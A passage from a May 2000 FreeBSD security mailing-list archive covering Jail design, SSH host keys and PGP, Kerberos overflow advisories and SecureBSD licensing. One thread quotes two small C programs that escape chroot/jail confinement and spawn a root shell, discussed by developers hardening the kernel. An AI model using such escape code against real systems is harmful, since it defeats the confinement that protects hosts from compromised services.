the kernel relating to the TrustedBSD project--this > } should have a side benefit of improving the relationship between jail() > } and the base OS, making Jail easier to maintain and modify. > > I think this is also the right thing to do. I would go so far as to > deprecate the jail(2) syscall, and implement jail(8) in terms of > the syscalls to set up the virtual network interfaces, the syscalls > to set the process capabilities, and chroot(). I tend to agree. I'm currently working on a design document for a modular kernel policy mechanism that would allow pluggable and extendable security policies, including the capability-limitations associated with Jail. I should be posting a first draft to trustedbsd-discuss and freebsd-security in a couple of days. This would be distinct from virtualization and namespace services, but would be responsible for preventing changes to the virtualization/namespace after it was created and appropriate process properties were configured. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:45:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from alpha.root-servers.ch (alpha.root-servers.ch [195.49.62.125]) by hub.freebsd.org (Postfix) with SMTP id 06BBA37B5DA for ; Thu, 18 May 2000 07:45:39 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch) Received: (qmail 13863 invoked from network); 18 May 2000 14:47:34 -0000 Received: from unknown (HELO ATHLON-550) (62.2.99.59) by ns1.root-servers.ch with SMTP; 18 May 2000 14:47:34 -0000 Date: Thu, 18 May 2000 16:46:21 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.42 Beta/19) UNREG / CD5BF9353B3B7091 Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <1105383811.20000518164621@buz.ch> To: freebsd-security@freebsd.org Subject: Re: ipfw: HTTP(S) is working but everything else doesn't...[SOLVED] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, just wanted to thank all of you for your help. It's working now and I now also got the idea why SSH didn't work as it should. Thanks very much, again. Best regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:47:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6489937B5D8 for ; Thu, 18 May 2000 07:47:08 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA29232; Thu, 18 May 2000 10:47:03 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 10:47:03 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Geoffrey Robinson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Geoffrey Robinson wrote: > On Wed, 17 May 2000, Robert Watson wrote: > > > Jail works by: > > > > 1) Chrooting the child process > > 2) Limiting the scope of superuser privileges accessible by uid0 processes > > in the jail > > > > It does not attempt to prevent processes outside the jail from > > communicating with processes within the jail. As such, having a process > > do so wouldn't defeat the jail per se, but would defeat the purpose of the > > jail :-). > > Still, like any network service the security impact would depend on how > well the server application was written not on the fact you have a link to > the host system. Right? The point of jail() is to limit the scope of compromise, if any, to within the jail. As such, the integrity of a jail should rest with the applications that run in it, but the integrity of the host should not. I.e., one of the intended environments for jail use is a delegation model wherein virtual subsystems are provided to individuals/groups/organizations for their own management. By virtue of the jail'd file system being a subset of the host file system, communication is possible between jails and the host (as well as signal delivery, et al), but any such communication should have to be initiated by processes outside the jail, not from within. > > One way to substantially improve jail scalability would be to allow the > > same (read-only) file system to be present in all jails as the root, with > > only jail-local data being modified. You can imagine gratuitously using > > nullfs (if it worked) to do this, and mount per-jail writable fs's for > > appropriatel subdirectories (/etc, /usr/local, /home) with appropriate > > symlinks within the jail. Right now, each jail costs you the size of > > world, and is hard to upgrade if you have any decent number of jails. > > Storing all that stuff in a single tree mapped read-only into jails would > > solve that (you'd probably want two so you could upgrade one, test it, and > > then swap to that for all jails so as to minimize downtime). > > If I wanted to do that. Would it be as easy as building a jail on a > spare partition then mounting it read-only to the correct locations? Right now the device handling prevents multiple read-only mounts of the same partition in multiple places. This is unfortunate, but I understand that Poul-Henning Kemp's changes to the bio/device management will address this, among other things. That said, it would be more efficient to make use of some sort of name space translation (assuming our VFS could do it) as you could allow greater reuse of storage/management resources. I assume the buffer cache would be shared between the two in the multi-mount case, but not the vnodes. That might also be the case in the namespace translation instance, so it may be lose-lose in both situations. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8: 7:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.xox.pl (xox.pl [212.244.220.62]) by hub.freebsd.org (Postfix) with SMTP id 08F0137B6E3 for ; Thu, 18 May 2000 08:07:14 -0700 (PDT) (envelope-from noxious@xox.pl) Received: (qmail 15774 invoked by uid 5429); 18 May 2000 15:09:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 May 2000 15:09:56 -0000 Date: Thu, 18 May 2000 17:09:55 +0200 (CEST) From: noxious noxious To: freebsd-security@FreeBSd.ORG Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8:32:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 827C437B6E3 for ; Thu, 18 May 2000 08:32:12 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id LAA29643; Thu, 18 May 2000 11:31:54 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 11:31:53 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Martin Machacek Cc: security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 18 May 2000, Martin Machacek wrote: > On 17-May-00 Garrett Wollman wrote: > > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so > > they really don't care whether the commercial product exists or not. > > I use GnuPG, personally, since then I don't have to worry about any > > licensing issues at all. > > I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any > problems. Maybe that's another reason ... For all interested: I contacted the appropriate NAI/PGP developers to find out about a native FreeBSD build a few weeks ago. The response was that they have seen zero (0) demand for a FreeBSD build, and therefore don't believe there is a substantial market to support a porting effort. I would tend to believe it's one of these, ``If you don't build it, they won't come'' kind of things, as well as that the communication channels between sales and development on that side are quite weak--prior to joining NAI, I spent literally hours on the phone trying to register my copy of PGP and failed to give them money :-(. However, I think an organized campaign here would make a difference--if your company has an NAI/PGP sales rep, let them know that you're interested in a native FreeBSD build. In particular, let them know if you are willing to spend money--there's no point in building a visible demand that falls through on the sales side, making it less likely to happen next time :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 8:54:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id D128637B50D for ; Thu, 18 May 2000 08:54:41 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA05366; Thu, 18 May 2000 11:54:31 -0400 (EDT) (envelope-from wollman) Date: Thu, 18 May 2000 11:54:31 -0400 (EDT) From: Garrett Wollman Message-Id: <200005181554.LAA05366@khavrinen.lcs.mit.edu> To: Wes Peters Cc: security@FreeBSD.org Subject: CAs (was: Re: HEADS UP: New host key for freefall!) In-Reply-To: <3923A26C.2E61D1E1@softweyr.com> References: <200005171951.PAA15001@khavrinen.lcs.mit.edu> <3923A26C.2E61D1E1@softweyr.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Right. Our needs are relatively simple: > o Generate and keep safe a CA key. Sure. > o Sign a certificate request for each committer. I don't see that this is necessary or useful. > o Generate and keep safe a certificate for each "hat". Generate and keep safe a *key* for each role account. The certificate itself is by design public knowledge. > o Be able to transfer certificates from one person to another when a > new head fills a "hat". Again, s/certificate/key/g. > There is a lot more than email to be considered here. New SSH keys > for freefall could be much more easily posted on a secure web page > than emailed to the whole world. But doing so wouldn't prove anything. In a case like this, the new key needs to be vouched for by a specific person: the person who installed the new key (in this case, the root@FreeBSD.org role account). In such a circumstance, X.509 has little advantage and lots of unnecessary complexity and cost over something like PGP. -GAWollman -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 10: 3: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 57E3E37BC87 for ; Thu, 18 May 2000 10:02:43 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 8630 invoked by uid 1000); 18 May 2000 17:02:39 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 May 2000 17:02:39 -0000 Date: Thu, 18 May 2000 12:02:39 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: security@FreeBSD.ORG Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson, at 11:31 -0400 on Thu, 18 May 2000, wrote: > However, I think an organized campaign here would make a difference--if > your company has an NAI/PGP sales rep, let them know that you're > interested in a native FreeBSD build. In particular, let them know if you > are willing to spend money--there's no point in building a visible demand > that falls through on the sales side, making it less likely to happen next > time :-). Currently, GnuPG is probably a more acceptable open source OpenPGP implementation than NAI's PGP. The fact that it is totally unencumbered by patents and developed outside the US is good for any import-export quirks. -- Frank Tobin http://www.uiuc.edu/~ftobin/ "To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 13:22: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id 5737537B51E for ; Thu, 18 May 2000 13:22:03 -0700 (PDT) (envelope-from dwerthmu@ctg.albany.edu) Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Thu, 18 May 2000 16:24:10 -0400 Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F7717@ctg-nt.ctg.albany.edu> From: Derek Werthmuller To: security@FreeBSD.ORG Subject: Any Advisory for the recent Kerberos 5 buffer overflow ? Date: Thu, 18 May 2000 16:24:10 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See yesterdays cert advistory Systems Affected Systems running services authenticated via Kerberos 4 Some systems running services authenticated via Kerberos 5 Systems running the Kerberized remote shell daemon (krshd) Systems with the Kerberos 5 ksu utility installed Systems with the Kerberos 5 v4rcp utility installed Derek Werthmuller Center for Technology in Government To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 13:26: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0998F37B914; Thu, 18 May 2000 13:26:05 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA63740; Thu, 18 May 2000 13:26:04 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 18 May 2000 13:25:49 -0700 (PDT) From: Kris Kennaway To: Derek Werthmuller Cc: security@FreeBSD.ORG Subject: Re: Any Advisory for the recent Kerberos 5 buffer overflow ? In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F7717@ctg-nt.ctg.albany.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- I'm going to try and get a formal advisory written tonight, but in the meantime here's what I sent to bugtraq: On Tue, 16 May 2000, Jeffrey I. Schiller wrote: > SUMMARY: > > Serious buffer overrun vulnerabilities exist in many implementations > of Kerberos 4, including implementations included for backwards > compatibility in Kerberos 5 implementations. Other less serious > buffer overrun vulnerabilites have also been discovered. ALL KNOWN > KERBEROS 4 IMPLEMENTATIONS derived from MIT sources are believed to be > vulnerable. For some reason CERT only gave the FreeBSD Security Officer team less than 5 hours last night (from 5:30PM EST when we were sent the draft to 10:30PM EST when their advisory was released) to respond with vendor status, so let me repeat it here for curious Bugtraq readers wondering why we were absent from the advisory: FreeBSD is not vulnerable by default: Kerberos is not installed by default, and the base system uses KTH Kerberos, not MIT Kerberos, which is not believed to be vulnerable. We do include a port of MIT Kerberos 5 in the FreeBSD Ports Collection which was vulnerable, but has been patched to address the known problems (from patches posted here and in the initial advisory). All users who have chosen to install the /usr/ports/security/krb5 port should immediately update their ports collection and reinstall the port. Kris FreeBSD Ports Security Officer - ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Comment: Made with pgp4pine 1.74 Charset: noconv iQCVAwUBOSRR3FUuHi5z0oilAQG3UwQAjXCROQrnzpY2HoVmDeazrf8Pp5FmUYcH +8nAIYGo743vq1W04/uhatH66m9kYva2amt5fCG0ZdbWaGyziuEun4giXHVazoA+ cGYMefK+vHcfoY6N8DvRKmsEIE7p/S1JudGv6YHq6OGvw3mjUNWWkOL99GPPXmiD 5892ZWdWQlU= =SW+k -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 14:44:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 48FBF37B8D7; Thu, 18 May 2000 14:44:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA73498; Thu, 18 May 2000 14:44:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 18 May 2000 14:44:20 -0700 (PDT) From: Kris Kennaway To: Derek Werthmuller Cc: security@FreeBSD.ORG Subject: Re: Any Advisory for the recent Kerberos 5 buffer overflow ? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- On Thu, 18 May 2000, Kris Kennaway wrote: > I'm going to try and get a formal advisory written tonight, but in the > meantime here's what I sent to bugtraq: An addendum: Robert Watson pointed out to me that FreeBSD used to use a closely-derived version of MIT Kerberos called eBones to provide Kerberos functionality. Looking at the CVS history, it seems that FreeBSD 2.2 systems from before 1998 (i.e. 2.2.5-RELEASE and earlier) may be vulnerable to this problem if you installed the eBones (Kerberos) distribution. If anyone still has such a system in production you're strongly advised to upgrade it at least to 2.2.8-STABLE (2.2.6-RELEASE replaced eBones with KTH Kerberos). Note however that 2.2 systems are no longer officially supported for security fixes and not all such fixes are backported (3.4 and later are the only supported releases). Kris - ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Comment: Made with pgp4pine 1.74 Charset: noconv iQCVAwUBOSRkQFUuHi5z0oilAQEivQP9EizKCIUkxiqk/7cakvBjU4ABL94yLXUk +iW78qAvFnNTa/jNUPn+namQ2e/ddqUX+EJS7ZAjni2lcaXQFAwnFVLYtuwf+g9k olMPfyJR/pb4hdXGYsMeH+WqskF44vNQjVESBBL/CLT4kBPY0+JhFIpN1F4zi/Z6 uby/UyNvQ8c= =T5q2 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 14:47:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 3EFB937BA9E for ; Thu, 18 May 2000 14:47:43 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id XAA02782; Thu, 18 May 2000 23:20:41 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Harold Gutch Cc: Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Fri, 12 May 2000 20:06:19 +0200." <20000512200619.A14067@foobar.franken.de> Date: Thu, 18 May 2000 23:20:41 +0200 Message-ID: <2780.958684841@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please check the action of the "kern.chroot_allow_open_directories" for a deeper explanation of this one. It is not set to zero for fear of compatibility issues. Maybe we should set it to zero in -current to see if there are any such issues. Poul-Henning In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes: >On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote: >> chrooted environment including jail, however testing the break out of >> jail exploit (good thing I tested before I spoke), which BTW worked on >> FreeBSD-3 and numerous other platforms including Linux, Solaris, and >> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good >> thing! When did the FreeBSD chroot(2) get fixed? >> >> Once again FreeBSD leads the way. >> >> Following is the break-out-of-jail code. >> >> #include >> #include >> >> const char *shell = "/bin/sh"; >> const char *lowerdir = "/tmp"; >> >> int main() { >> int i; >> >> assert(chdir("/") != -1); >> assert(chroot(lowerdir) != -1); >> for (i = 0; i < 32; i++) >> assert(chdir("..") != -1); >> assert(chroot(".") != -1); >> >> assert(execl(shell, shell, NULL) != -1); >> }; > > >What about the "other" chroot-breakout, does it still work under >FreeBSD 4.0? >Here's the breakout-code modulo checks wether /tmp exists etc. > >#include >#include >#include > >int main(int argc, char *argv[]) >{ > int handle, i; > > handle = open("/", O_RDONLY); > chroot("/tmp"); > chdir("/"); > fchdir(handle); > for (i = 0; i < 32; i++) > chdir(".."); > chroot("."); > chdir("/"); > system("/bin/sh"); > > return 0; >} > >bye, > Harold > >-- >Someone should do a study to find out how many human life spans have >been lost waiting for NT to reboot. > Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 23: 6:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2381937BA8D for ; Thu, 18 May 2000 23:06:44 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA92477; Fri, 19 May 2000 00:06:41 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA99294; Fri, 19 May 2000 00:05:52 -0600 (MDT) Message-Id: <200005190605.AAA99294@harmony.village.org> To: Poul-Henning Kamp Subject: Re: envy.vuurwerk.nl daily run output Cc: Harold Gutch , Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 18 May 2000 23:20:41 +0200." <2780.958684841@critter.freebsd.dk> References: <2780.958684841@critter.freebsd.dk> Date: Fri, 19 May 2000 00:05:52 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <2780.958684841@critter.freebsd.dk> Poul-Henning Kamp writes: : Please check the action of the "kern.chroot_allow_open_directories" : for a deeper explanation of this one. It is not set to zero for : fear of compatibility issues. Maybe we should set it to zero in : -current to see if there are any such issues. Go for it. It anything substantial breaks, we can see what's less painful, compatibilty or fixing. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 7:59:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7A6BA37B6C9 for ; Sat, 20 May 2000 07:59:30 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1251 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 20 May 2000 09:51:23 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Sat, 20 May 2000 09:51:19 -0500 (CDT) From: James Wyatt To: Martin Machacek Cc: security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 18 May 2000, Martin Machacek wrote: > On 17-May-00 Garrett Wollman wrote: > > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so > > they really don't care whether the commercial product exists or not. > > I use GnuPG, personally, since then I don't have to worry about any > > licensing issues at all. > > I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any > problems. Maybe that's another reason ... A while back we looked through their web site and tried to figure out how to order PGP for AIX, FreeBSD, and NT. At the time it wasn't too obvious. Has that changed? Could someone tell me the cost? Please reply via direct mail, this is getting way OT... - Thanks - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 12:36:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 208B337B50C for ; Sat, 20 May 2000 12:36:44 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id MAA90500 for ; Sat, 20 May 2000 12:39:09 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: security@freebsd.org Subject: The SecureBSD stuff is now available for download Date: Sat, 20 May 2000 12:39:09 -0700 Message-ID: <90497.958851549@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://www.securebsd.com/download.html JFYI - we should probably look at what they've done. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 12:41:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A42F37B677; Sat, 20 May 2000 12:41:07 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id MAA73424; Sat, 20 May 2000 12:41:07 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Sat, 20 May 2000 12:41:06 -0700 (PDT) From: Kris Kennaway To: "Jordan K. Hubbard" Cc: security@freebsd.org Subject: Re: The SecureBSD stuff is now available for download In-Reply-To: <90497.958851549@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 20 May 2000, Jordan K. Hubbard wrote: > http://www.securebsd.com/download.html > > JFYI - we should probably look at what they've done. Actually, we shouldn't, because the license will contaminate any derived work. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 12:49:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51A5037B631; Sat, 20 May 2000 12:49:08 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id MAA74288; Sat, 20 May 2000 12:49:08 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Sat, 20 May 2000 12:49:08 -0700 (PDT) From: Kris Kennaway To: "Jordan K. Hubbard" Cc: security@freebsd.org Subject: Re: The SecureBSD stuff is now available for download In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 20 May 2000, Kris Kennaway wrote: > > http://www.securebsd.com/download.html > > > > JFYI - we should probably look at what they've done. > > Actually, we shouldn't, because the license will contaminate any derived > work. More to the point, we're not *allowed* to make any derived works..it's a pretty nasty license. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 12:53: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id 8077437B6E9; Sat, 20 May 2000 12:52:59 -0700 (PDT) (envelope-from bitsurfr@enteract.com) Received: from bugsbunny (216-80-34-42.d.enteract.com [216.80.34.42]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id OAA38598; Sat, 20 May 2000 14:52:57 -0500 (CDT) (envelope-from bitsurfr@enteract.com) From: "Chris Silva" To: "Kris Kennaway" , "Jordan K. Hubbard" Cc: Subject: RE: The SecureBSD stuff is now available for download Date: Sat, 20 May 2000 14:52:26 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cripes - they are using what I use for a desktop image... I wonder if they have the autority to use that image... - -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Saturday, May 20, 2000 2:41 PM To: Jordan K. Hubbard Cc: security@freebsd.org Subject: Re: The SecureBSD stuff is now available for download On Sat, 20 May 2000, Jordan K. Hubbard wrote: > http://www.securebsd.com/download.html > > JFYI - we should probably look at what they've done. Actually, we shouldn't, because the license will contaminate any derived work. Kris - ---- In God we Trust -- all others must submit an X.509 certificate. -- 